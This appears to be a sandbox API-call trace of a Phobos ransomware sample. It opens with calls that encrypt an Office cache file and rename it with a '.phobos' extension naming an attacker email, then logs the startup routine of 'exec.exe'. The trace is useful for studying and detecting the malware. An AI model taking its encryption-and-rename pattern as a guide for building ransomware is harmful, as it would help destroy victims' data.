SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32efa60 | out: lpNewFilePointer=0x0) returned 1 [0065.721] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0065.723] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x32efa18, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32efa74 | out: phKey=0x32efa74*=0x2f6220) returned 1 [0065.723] CryptSetKeyParam (hKey=0x2f6220, dwParam=0x1, pbData=0x32efb20, dwFlags=0x0) returned 1 [0065.723] ReadFile (hFile=0x150, lpBuffer=0x34f0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32efa9c, lpOverlapped=0x0) Process: id = "2" image_name = "exec.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe" page_root = "0x444c1000" os_pid = "0x98c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x96c" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5 os_tid = 0x990 [0038.897] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x41fcf4 | out: lpSystemTimeAsFileTime=0x41fcf4*(dwLowDateTime=0xee8b9f40, dwHighDateTime=0x1d4f17e)) [0038.897] GetCurrentProcessId () returned 0x98c [0038.897] GetCurrentThreadId () returned 0x990 [0038.897] GetTickCount () returned 0x1a1ab [0038.897] QueryPerformanceCounter (in: lpPerformanceCount=0x41fcec | out: lpPerformanceCount=0x41fcec*=15870564687) returned 1 [0038.897] GetStartupInfoW (in: lpStartupInfo=0x41fc98 | out: lpStartupInfo=0x41fc98*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x41fcfc, hStdError=0x1248be4)) [0038.897] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.897] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x870000 [0038.899] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0038.899] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0038.900] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x214) returned 0x8707d0 [0038.900] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0038.901] GetCurrentThreadId () returned 0x990 [0038.901] GetStartupInfoW (in: lpStartupInfo=0x41fc34 | out: lpStartupInfo=0x41fc34*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x12471aa, hStdOutput=0x12474e3, hStdError=0x8707d0)) [0038.901] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x800) returned 0x8709f0 [0038.902] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0038.902] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0038.902] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0038.902] SetHandleCount (uNumber=0x20) returned 0x20 [0038.902] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe\"" [0038.902] GetEnvironmentStringsW () returned 0x2246c8* [0038.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0038.902] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x565) returned 0x8711f8 [0038.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x8711f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0038.902] FreeEnvironmentStringsW (penv=0x2246c8) returned 1 [0038.902] GetLastError () returned 0x5 [0038.903] SetLastError (dwErrCode=0x5) [0038.903] GetLastError () returned 0x5 [0038.903] SetLastError (dwErrCode=0x5) [0038.903] GetLastError () returned 0x5 [0038.903] SetLastError (dwErrCode=0x5) [0038.903] GetACP () returned 0x4e4 [0038.903] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x220) returned 0x871768 [0038.903] GetLastError () returned 0x5 [0038.903] SetLastError (dwErrCode=0x5) [0038.903] IsValidCodePage (CodePage=0x4e4) returned 1 [0038.903] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x41fbfc | out: lpCPInfo=0x41fbfc) returned 1 [0038.903] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x41f6c8 | out: lpCPInfo=0x41f6c8) returned 1 [0038.903] GetLastError () returned 0x5 [0038.903] SetLastError (dwErrCode=0x5) [0038.903] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41fadc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0038.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41fadc, cbMultiByte=256, lpWideCharStr=0x41f448, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鲧ĤĀ") returned 256 [0038.904] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鲧ĤĀ", cchSrc=256, lpCharType=0x41f6dc | out: lpCharType=0x41f6dc) returned 1 [0038.904] GetLastError () returned 0x5 [0038.904] SetLastError (dwErrCode=0x5) [0038.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41fadc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0038.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41fadc, cbMultiByte=256, lpWideCharStr=0x41f418, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0038.904] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0038.904] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x41f208, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0038.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x41f9dc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xa5\x46\xff\x5f\x14\xfc\x41", lpUsedDefaultChar=0x0) returned 256 [0038.904] GetLastError () returned 0x5 [0038.904] SetLastError (dwErrCode=0x5) [0038.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41fadc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0038.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x41fadc, cbMultiByte=256, lpWideCharStr=0x41f438, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0038.904] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0038.904] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x41f228, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0038.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x41f8dc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xa5\x46\xff\x5f\x14\xfc\x41", lpUsedDefaultChar=0x0) returned 256 [0038.905] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x124f728, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0038.905] GetLastError () returned 0x0 [0038.905] SetLastError (dwErrCode=0x0) [0038.905] GetLastError () returned 0x0 [0038.905] SetLastError (dwErrCode=0x0) [0038.905] GetLastError () returned 0x0 [0038.905] SetLastError (dwErrCode=0x0) [0038.905] GetLastError () returned 0x0 [0038.905] SetLastError (dwErrCode=0x0) [0038.905] GetLastError () returned 0x0 [0038.905] SetLastError (dwErrCode=0x0) [0038.905] GetLastError () returned 0x0 [0038.905] SetLastError (dwErrCode=0x0) [0038.905] GetLastError () returned 0x0 [0038.906] SetLastError (dwErrCode=0x0) [0038.906] GetLastError () returned 0x0 [0038.906] SetLastError (dwErrCode=0x0) 